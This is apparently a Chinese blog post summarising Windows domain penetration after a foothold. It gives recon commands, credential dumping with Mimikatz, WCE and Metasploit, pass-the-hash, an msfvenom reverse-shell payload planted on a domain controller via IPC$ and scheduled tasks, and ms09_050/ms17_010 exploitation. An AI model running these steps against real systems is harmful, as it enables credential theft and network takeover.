内网域渗透学习小结

内网域渗透学习小结

内网域渗透学习小结

 总结的思路可能有些乱 - - 当做个记录而已。

获取域中某台机器控制权后

渗透思路就是拿下域控的权限 实现对整个域的控制

 

0x01信息收集:

 

1. ipconfig /all

   2.net view /domain                    查看有几个域

   3.net view /domain:XXX                            查看此域内电脑

   4.net group /domain       查询域里面的组

   5.net group “domain admins” /domain     查看域管理员

   6.net group “domain controllers” /domain     查看域控制器

   7.net group “enterprise admins” /domain     查看企业管理

 

 

知道了所在域和域控的ip后(一般域控和dns为同一台服务器)

 

 

明确渗透思路:

从域主机入手:抓取域主机HASH--->登录到域进行域控的shell反弹或者在域主机上进行hash注入 登录到域控伪造ticket(pass the ticket)

直接从域控入手:0day溢出漏洞(smb、rdp、rpc、dns)、各种服务弱口令爆破、hash注入读取lsa明文密码

Ps:拿到域主机或者域控可能会遇到很多安全策略端口限制

利用lcx portfwd这些工具进行端口映射、端口转发 再进行3389连接

1. 使用WCE和MIMIKATZ（这2个工具必须要管理员的权限，而且注意工具的免杀）
   2.使用MSF的hashdump模块，一个是hashdump，只能导出本地hash,另一个是smart_hashdump(必须是管理员权限),可以导出域用户的hash
   3.使用Powershell模块直接导出

 

抓取hash工具使用笔记：

 

1) WCE

常用参数

-l  默认的参数 列出登录的会话和NTLM凭据（默认值）

 

-w  通过摘要式认证缓存一个明文的密码

 

 

-s  （hash注入 根本登录凭据 即不需破出hash的明文密码也可登录管理）格式：wce.exe -s 用户名:对方机器名或者ip:LM-HASH:NT-HASH

hash注入的原理是将我们预备好的目标机器的本地或者是域用户hash注入到本地的认证进程lsass.exe中去，使得本地在使用ipc登录目标机器的时候就如同自己登录自己的机器一样获得权限。hash注入本身是为了对付那些破解不了的NTHASH。

 

2）MIMIKATZ

第一条：privilege::debug//提升权限
第二条：sekurlsa::logonpasswords//抓取密码

 

 

3）使用msf中的两个hash抓取模块

hashdump，只能导出本地hash,另一个是smart_hashdump(必须是管理员权限),可以导出域用户的hash

 

4）使用Powershell模块直接导出

 

获取了受控这台域主机后 下一步渗透就是接近我们的域控目标

 

分两种情况

 

A.如果不能直接攻击域服务器，我们需要再攻击内网某个服务器，然后再攻击域服务器 B.可以直接攻击域服务器 对于情况A: 1.我们可以利用抓到的密码加上我们收集的信息编个字典，然后添加路由进行弱口令的扫描 2.使用PsExec爆破整个局域网或者反弹meterpreter 3.利用smb_login模块扫描内网 4.利用当前权限，用WIN下面的PsExec进行内网渗透 5.使用powershell对内网进行扫描（要求WIN7以上服务器） 6.架设socks4a，然后进行内网扫描 7.利用当前权限，进行内网IPC$渗透

 

 

对于情况B:

使用抓取的账号密码 登录到域控的ipc连接 添加任务 让域主机定时执行我们用VEIL生成的meterpreter(或者msfvenom)  进行shell反弹

 

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=4444 -f exe > shell.exe

生成shell.exe服务端

 

受控域主机 ipc连接域控

Net use \\域控ip 密码 /user:域名\用户名

 

 

查看共享目录

 

 

 

Copy命令上传我们的shell.exe  at命令定时执行

At \\域控ip 时间 任务路径

不过默认win2008没有开启计划服务

 

Msf监听反弹的木马

 

域控计划执行shell.exe  

 

成功反弹域控shell

接着就是在域控上进行抓取hash

 

可以用Mimikatz也可以用run post/windows/gather/hashdump

 

这里我使用msf的hash抓取

 

显示权限不够

Getsystem一下

 

再次抓取域控hash

 

抓取成功

 

 

 

 

抓取成功后进行hash注入 注入域管理帐号 拿到域控

 

 

 

 

 

 

 

 

 

 

 

 

 

还有对域控直接攻击的方法就是远程溢出漏洞

 

 

先用nmap扫描探测常见的漏洞

 

 

 

 

 

 

发现

 

CVE-2009-3103存在此漏洞 

 

上网查找了这个漏洞对应的ms漏洞编号

 

使用msf 利用ms09_050 进行溢出提权

 

拿下域控

 

 

同样 看到开放了445  通过ms17_010一样可以溢出提权

 

 

 

 

至于弱口令爆破 没有尝试 因为域控的密码策略都是小写大小特殊符号的组合 就一般不对域控进行弱口令爆破

 

 

 

posted @ 2018-12-16 21:55 卿先生 阅读(...) 评论(...) 编辑 收藏